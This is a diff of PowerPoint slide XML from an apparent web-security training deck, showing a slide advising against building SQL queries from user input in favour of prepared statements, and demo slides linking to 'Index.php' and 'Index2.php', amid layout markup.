+            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="0070C0"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Avoid constructing SQL queries with user input</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="0070C0"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Use </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>SQL variable binding &amp; prepared statements</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
                 <a:schemeClr val="tx1"/>
               </a:solidFill>
@@ -19644,7 +20361,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3796370955"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1310789644"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -19717,7 +20434,7 @@
                 </a:solidFill>
               </a:rPr>
               <a:pPr/>
-              <a:t>Tuesday, April 28, 2015</a:t>
+              <a:t>Wednesday, May 06, 2015</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US" dirty="0">
               <a:solidFill>
@@ -19811,7 +20528,7 @@
         </p:nvSpPr>
         <p:spPr bwMode="auto">
           <a:xfrm>
-            <a:off x="125944" y="1084023"/>
+            <a:off x="125944" y="1018034"/>
             <a:ext cx="8720218" cy="1143000"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -19967,14 +20684,7 @@
                 <a:latin typeface="Constantia"/>
                 <a:cs typeface="Constantia"/>
               </a:rPr>
-              <a:t>Want to see a </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
-                <a:latin typeface="Constantia"/>
-                <a:cs typeface="Constantia"/>
-              </a:rPr>
-              <a:t>real hack?</a:t>
+              <a:t>Demo</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="4000" dirty="0">
               <a:latin typeface="Constantia"/>
@@ -20193,16 +20903,22 @@
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
                 </a:solidFill>
-              </a:rPr>
-              <a:t>Let’s go!!!</a:t>
-            </a:r>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Index.php</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1148958190"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167973777"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -20250,6 +20966,1671 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
+          <p:cNvPr id="3" name="Date Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="dt" sz="half" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="6530996"/>
+            <a:ext cx="2133600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{945310C2-C0B2-5241-BEC0-6819B2B3C035}" type="datetime2">
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:pPr/>
+              <a:t>Wednesday, May 06, 2015</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FFFFFF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Footer Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="ftr" sz="quarter" idx="11"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3124200" y="6530996"/>
+            <a:ext cx="2895600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>www.qsoftvietnam.com</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6853962" y="6530996"/>
+            <a:ext cx="2133600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{FA84A37A-AFC2-4A01-80A1-FC20F2C0D5BB}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:pPr/>
+              <a:t>24</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FFFFFF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Title 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="125944" y="1018034"/>
+            <a:ext cx="8720218" cy="1143000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="9525">
+            <a:noFill/>
+            <a:miter lim="800000"/>
+            <a:headEnd/>
+            <a:tailEnd/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
+            <a:prstTxWarp prst="textNoShape">
+              <a:avLst/>
+            </a:prstTxWarp>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Lucida Sans" pitchFamily="34" charset="0"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
+                <a:latin typeface="Constantia"/>
+                <a:cs typeface="Constantia"/>
+              </a:rPr>
+              <a:t>Demo</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
+              <a:latin typeface="Constantia"/>
+              <a:cs typeface="Constantia"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Content Placeholder 2"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="457200" y="2547533"/>
+            <a:ext cx="8229600" cy="3361133"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="9525">
+            <a:noFill/>
+            <a:miter lim="800000"/>
+            <a:headEnd/>
+            <a:tailEnd/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
+            <a:prstTxWarp prst="textNoShape">
+              <a:avLst/>
+            </a:prstTxWarp>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="0" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="457200" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="914400" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1371600" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="1600" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="1828800" indent="0" algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buFont typeface="Arial" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="1600" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2286000" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2743200" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3200400" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3657600" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="20000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:tint val="75000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900" algn="l">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Index2.php</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3334160463"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
+    <mc:Choice Requires="p14">
+      <p:transition p14:dur="100">
+        <p:cut/>
+      </p:transition>
+    </mc:Choice>
+    <mc:Fallback xmlns="">
+      <p:transition>
+        <p:cut/>
+      </p:transition>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Date Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="dt" sz="half" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="6530996"/>
+            <a:ext cx="2133600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{945310C2-C0B2-5241-BEC0-6819B2B3C035}" type="datetime2">
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:pPr/>
+              <a:t>Wednesday, May 06, 2015</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FFFFFF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Footer Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="ftr" sz="quarter" idx="11"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3124200" y="6530996"/>
+            <a:ext cx="2895600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="bg1"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>www.qsoftvietnam.com</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="bg1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6853962" y="6530996"/>
+            <a:ext cx="2133600" cy="365125"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{FA84A37A-AFC2-4A01-80A1-FC20F2C0D5BB}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0">
+                <a:solidFill>
+                  <a:srgbClr val="FFFFFF"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:pPr/>
+              <a:t>25</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="FFFFFF"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Title 1"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr bwMode="auto">
+          <a:xfrm>
+            <a:off x="125944" y="1018034"/>
+            <a:ext cx="8720218" cy="1143000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="9525">
+            <a:noFill/>
+            <a:miter lim="800000"/>
+            <a:headEnd/>
+            <a:tailEnd/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
+            <a:prstTxWarp prst="textNoShape">
+              <a:avLst/>
+            </a:prstTxWarp>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mj-lt"/>
+                <a:ea typeface="+mj-ea"/>
+                <a:cs typeface="+mj-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:defRPr sz="4400">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="Arial" charset="0"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
